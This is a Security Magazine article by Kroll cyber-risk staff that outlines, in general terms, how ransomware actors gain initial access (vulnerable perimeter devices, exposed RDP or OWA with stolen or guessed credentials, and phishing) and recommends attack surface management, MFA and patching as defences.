Security Magazine logo
search
cart
facebook twitter linkedin youtube
  • Sign In
  • Create Account
  • Sign Out
  • My Account
Security Magazine logo
  • NEWS
    • Security Newswire
    • Technologies & Solutions
  • MANAGEMENT
    • Leadership Management
    • Enterprise Services
    • Security Education & Training
    • Logical Security
    • Security & Business Resilience
    • Profiles in Excellence
  • PHYSICAL
    • Access Management
    • Fire & Life Safety
    • Identity Management
    • Physical Security
    • Video Surveillance
    • Case Studies (Physical)
  • CYBER
    • Cybersecurity News
    • More
  • BLOG
  • COLUMNS
    • Cyber Tactics
    • Leadership & Management
    • Security Talk
    • Career Intelligence
    • Leader to Leader
    • Cybersecurity Education & Training
  • EXCLUSIVES
    • Annual Guarding Report
    • Most Influential People in Security
    • The Security Benchmark Report
    • The Security Leadership Issue
    • Top Guard and Security Officer Companies
    • Top Cybersecurity Leaders
    • Women in Security
  • SECTORS
    • Arenas / Stadiums / Leagues / Entertainment
    • Banking/Finance/Insurance
    • Construction, Real Estate, Property Management
    • Education: K-12
    • Education: University
    • Government: Federal, State and Local
    • Hospitality & Casinos
    • Hospitals & Medical Centers
    • Infrastructure:Electric,Gas & Water
    • Ports: Sea, Land, & Air
    • Retail/Restaurants/Convenience
    • Transportation/Logistics/Supply Chain/Distribution/ Warehousing
  • EVENTS
    • Industry Events
    • Webinars
    • Solutions by Sector
    • Security 500 Conference
  • MEDIA
    • Videos
      • Cybersecurity & Geopolitical Discussion
      • Ask Me Anything (AMA) Series
    • Podcasts
    • Polls
    • Photo Galleries
  • MORE
    • Call for Entries
    • Classifieds & Job Listings
    • Continuing Education
    • Newsletter
    • Sponsor Insights
    • Store
    • White Papers
  • EMAG
    • eMagazine
    • This Month's Content
    • Advertise
  • SIGN UP!
CybersecurityManagementSecurity Leadership and ManagementLogical SecuritySecurity & Business Resilience

Initial access in cyberattacks: Common adversary methods and mitigation strategies

By Chris Ballod, Thomas Brittain, Jessica Venturo
Hacker codes at computer
January 11, 2022

As the ransomware marketplace matures, certain specialized skills have grown in demand, such as those that allow criminals to compromise systems and gain a foothold within the network. With that in mind, this article dives into effective ways to prevent threat actors from gaining initial access and minimize the destruction carried out in later stages of a ransomware attack.

Common methods for initial access

There are several tactics, techniques and procedures (TTPs) often used by threat actors to gain initial access to a victim’s network. These TTPs include:

  1. Identifying networks with vulnerable applications or devices, including virtual private network (VPN) appliances, perimeter devices (e.g., firewall devices) or other internet-facing devices (e.g., web servers, mail servers). During the last year, several critical vulnerabilities, including zero-day vulnerabilities, have been exploited by attackers to access sensitive data and/or execute code remotely.
  2. Locating systems or applications with remote-facing services, such as open Remote Desktop Protocol (RDP) or Outlook on the Web (OWA), which can potentially be leveraged for access by threat actors. We have seen threat actors access such services by testing credentials via brute-force attacks (e.g., password spraying), as well as by testing credentials related to the target network that were publicly exposed in credential dumps on the dark web.
  3. Sending phishing messages, typically via email but sometimes via live chat, to obtain access to victim systems. We have identified cases where threat actors sent one or more emails to victims containing malicious attachments or links that, when clicked upon or opened by the victim, allowed threat actors to obtain credentials and/or deploy malware that established access to the victim system.

Mitigation strategies to address common methods of initial access

To help mitigate the risk of threat actors leveraging these initial access methods, a layered approach can minimize an organization’s attack surface and subsequently enhance its protection by managing vulnerabilities.

Attack surface management

One of the first steps in effectively managing attack surface is identifying an organization’s IT assets and diagraming its network. Once assets are inventoried and the network is understood, an organization can understand its attack surface more accurately. Systems located on the network perimeter should be secured behind a firewall and/or VPN where possible. Hosts and applications that must remain web-facing — often email, cloud environments or hosts requiring external remote services — should be secured with two- or multi-factor authentication (2FA/MFA). MFA pairs a username and password with a unique additional factor, such as a PIN, and limits the ability of an attacker who has obtained a user’s username and password to successfully log in as the compromised user. MFA should be required for all remote access, cloud services and privileged access accounts.

Overall, understanding an organization’s attack surface, reducing this surface where possible and properly securing the remaining systems and services greatly reduces the risk of initial access. For example, attackers routinely target systems with open RDP services. By moving such remote access services behind a corporate remote access VPN connection and requiring MFA, an organization can defend against unauthorized access.

Vulnerability management

Once an organization has developed an IT asset inventory as discussed above, this also allows the organization to increase the comprehensiveness with which it can manage and secure its full scope of assets, not just those on the perimeter. Vulnerability management is critical to securing an organization’s IT assets. A mature vulnerability management program should include regular patching to mitigate the risk of vulnerabilities being exploited, as well as routine scanning of all external and internal systems, devices and applications for vulnerable software. Many perimeter and internet-connected devices (e.g., firewalls, VPNs and mail servers) currently in use by companies have critical published vulnerabilities that, if unpatched, open an organization to exploitation.

It is important to understand the assets used within your organization so applicable vendors can be monitored for security releases and patches can be performed in a timely manner. Additionally, there may be instances where patches are not yet available and/or additional actions must be performed to secure an asset from a new vulnerability.

For example, the recent vulnerabilities impacting Microsoft Exchange servers collectively referred to as ProxyShell and ProxyLogon organizations to the risk of malicious webshells being deployed to their Exchange servers. In some cases, even if the organization patched the Exchange server, any webshells successfully deployed to the server before the patch was applied had to be manually remediated to close the security gap. Understanding the required supplementary actions by performing activities such as monitoring threat intelligence sources, researching applicable vulnerabilities, or engaging a knowledgeable third party to assist in recovery is important to fully secure assets.

While the above recommendations may not address every method of initial access, nor mitigate certain activities that typically occur after initial access, implementing these practices will likely provide significant protection against common threats that companies face and allow an organization to limit an actor’s ability to gain initial access to its network. In addition to the vulnerability and attack surface management, we strongly recommend 10 cybersecurity controls essential for increased resilience.

If your organization does not have the internal capabilities to perform these strategies in-house, consider reaching out to a reputable third party to help provide any or all of the above services and improve your organization’s security posture.

KEYWORDS: attacks cyber attack cyber security threat initial access brokers (IABs) multi-factor authentication ransomware third-party cybersecurity

Share This Story

Looking for a reprint of this article?
From high-res PDFs to custom plaques, order your copy today!

Chris Ballod is an Associate Managing Director with the Cyber Risk practice of Kroll based in Philadelphia. Ballod's experience is in data privacy and cybersecurity, counseling clients in the preparation for a cyber incident, and during the response and notification process after an incident occurs. Prior to joining Kroll, Ballod was a Partner and Vice Chair of the Data Privacy & Cybersecurity practice at Lewis Brisbois Bisgaard & Smith LLP.

Thomas Brittain is an Associate Managing Director with the Cyber Risk practice of Kroll based in St. Louis. Brittain has information security experience advising organizations on secure configurations, risk reduction, incident response and tackling tough security challenges. Prior to joining Kroll, Brittain was Senior Manager of Carbon Black’s global incident response (IR) partner program.

Jessica Venturo is a Cyber Risk Senior Associate with Kroll based in Virginia. Venturo has experience supporting Fortune 500 companies in industries ranging from financial services to insurance to retail. She specializes in cyber investigations, incident response and digital forensics.

Recommended Content

JOIN TODAY
To unlock your recommendations.

Already have an account? Sign In

  • Security's Top Cybersecurity Leaders 2024

    Security's Top Cybersecurity Leaders 2024

    Security magazine's Top Cybersecurity Leaders 2024 award...
    Cybersecurity
    By: Security Staff
  • cyber brain

    The intersection of cybersecurity and artificial intelligence

    Artificial intelligence (AI) is a valuable cybersecurity...
    Cybersecurity
    By: Pam Nigro
  • artificial intelligence AI graphic

    Assessing the pros and cons of AI for cybersecurity

    Artificial intelligence (AI) has significant implications...
    New Security Technology
    By: Charles Denyer
Subscribe For Free!
  • Security eNewsletter & Other eNews Alerts
  • eMagazine Subscriptions
  • Manage My Preferences
  • Online Registration
  • Mobile App
  • Subscription Customer Service

More Videos

Sponsored Content

Sponsored Content is a special paid section where industry companies provide high quality, objective, non-commercial content around topics of interest to the Security audience. All Sponsored Content is supplied by the advertising company and any opinions expressed in this article are those of the author and not necessarily reflect the views of Security or its parent company, BNP Media. Interested in participating in our Sponsored Content section? Contact your local rep!

close
  • Crisis Response Team
    Sponsored byEverbridge

    Automate or Fall Behind – Crisis Response at the Speed of Risk

  • Perimeter security
    Sponsored byAMAROK

    Why Property Security is the New Competitive Advantage

  • Duty of Care
    Sponsored byAMAROK

    Integrating Technology and Physical Security to Advance Duty of Care

Popular Stories

Pills spilled

More than 20,000 sensitive medical records exposed

Laptop in darkness

Verizon 2025 Data Breach Investigations Report shows rise in cyberattacks

Coding on screen

Research reveals mass scanning and exploitation campaigns

White post office truck

Department of Labor Sues USPS Over Texas Whistleblower Termination

Computer with binary code hovering nearby

Cyberattacks Targeting US Increased by 136%

2025 Security Benchmark banner

Events

May 22, 2025

Proactive Crisis Communication

Crisis doesn't wait for the right time - it strikes when least expected. Is your team prepared to communicate clearly and effectively when it matters most?

September 29, 2025

Global Security Exchange (GSX)

 

View All Submit An Event

Products

Security Culture: A How-to Guide for Improving Security Culture and Dealing with People Risk in Your Organisation

Security Culture: A How-to Guide for Improving Security Culture and Dealing with People Risk in Your Organisation

See More Products

Related Articles

  • cyber security

    4 critical security strategies to prevent cyberattacks in 2022

    See More
  • Gloved hands typing on a lapop

    Unveiling common ransomware attack methods to secure your organization

    See More
  • hacker

    CISA outlines 10 initial access points exploited by hackers

    See More
×

Sign-up to receive top management & result-driven techniques in the industry.

Join over 20,000+ industry leaders who receive our premium content.

SIGN UP TODAY!
  • RESOURCES
    • Advertise
    • Contact Us
    • Store
    • Want More
  • SIGN UP TODAY
    • Create Account
    • eMagazine
    • eNewsletter
    • Customer Service
    • Manage Preferences
  • SERVICES
    • Marketing Services
    • Reprints
    • Market Research
    • List Rental
    • Survey/Respondent Access
  • STAY CONNECTED
    • LinkedIn
    • Facebook
    • YouTube
    • X (Twitter)
  • PRIVACY
    • PRIVACY POLICY
    • TERMS & CONDITIONS
    • DO NOT SELL MY PERSONAL INFORMATION
    • PRIVACY REQUEST
    • ACCESSIBILITY

Copyright ©2025. All Rights Reserved BNP Media.

Design, CMS, Hosting & Web Development :: ePublishing